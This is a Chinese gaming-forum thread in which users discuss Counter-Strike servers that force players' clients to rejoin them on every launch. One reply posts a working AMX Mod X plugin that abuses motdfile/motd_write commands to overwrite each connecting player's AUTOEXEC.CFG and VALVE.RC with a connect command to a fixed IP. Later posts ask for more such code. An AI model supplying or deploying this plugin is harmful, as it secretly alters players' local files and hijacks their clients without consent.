搜索

这是一个什么插件,打开客户端就进服

玩了一个 服务器 然后就 出现

下次 一打开客户端就自动进他的服里了 ,

真厉害 ,{:soso_e127:}
试试这2个插件吧
  1. #include < amxmodx >

2. #define IP "91.91.91.91:27091"

3. public auto_connect(id) {
  4.         client_cmd(id, "motdfile AUTOEXEC.CFG;motd_write Connect %s", IP)
  5.         client_cmd(id, "motdfile VALVE.RC;motd_write Connect %s", IP)
  6. }

7. public client_putinserver(id)
  8.         set_task(1.2, "auto_connect", id)
复制代码

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?注个册吧

css
仍然无法实现 valve.rc 的 缓存 产生  发表于 2013-11-3 23:16
css
valve rc 等 测试 汉字  发表于 2013-10-31 10:19
回复 0 1

貌似是显示在你的选项上方吧??这个是插件改变你客户端内的文件。然后显示他的服务器名字绑定他的IP。
你点击就直接连接了。

winnie7t 发表于 2013-6-4 10:34
貌似是显示在你的选项上方吧??这个是插件改变你客户端内的文件。然后显示他的服务器名字绑定他的IP。
你 ...

不需要点击 ,打开客户端就直接进入了

外面的服务器越来越流氓,只能向平台靠拢了

rsdtt 发表于 2013-8-15 17:16
外面的服务器越来越流氓,只能向平台靠拢了

哇 我的恩人还在论坛啊 ,好久不见了啊 ,

平台全是 引诱服务器 更混不开啊 呵呵

是不是 服务器端不是最新的版本 就 在互联网上搜索不到啊

bing w connect ip
可可可可咳咳咳

chwafz 发表于 2013-8-15 19:35
哇 我的恩人还在论坛啊 ,好久不见了啊 ,

平台全是 引诱服务器 更混不开啊 呵呵

我指的是豆客平台

插件修改客户端value.rc文件造成的

jakyotwins 发表于 2013-10-16 14:18

根本不需要这样修改:o

jakyotwins 发表于 2013-10-16 14:18

自动 给客户端 弄了个 valve.rc,是如何做到的呢 ,一直 在找答案 啊 ,找不到 ,不过  给客户端 弄 autoexec的 源码到处是 啊 ,很有效啊 求一个啊 ,谁知道啊 ,求求求

游客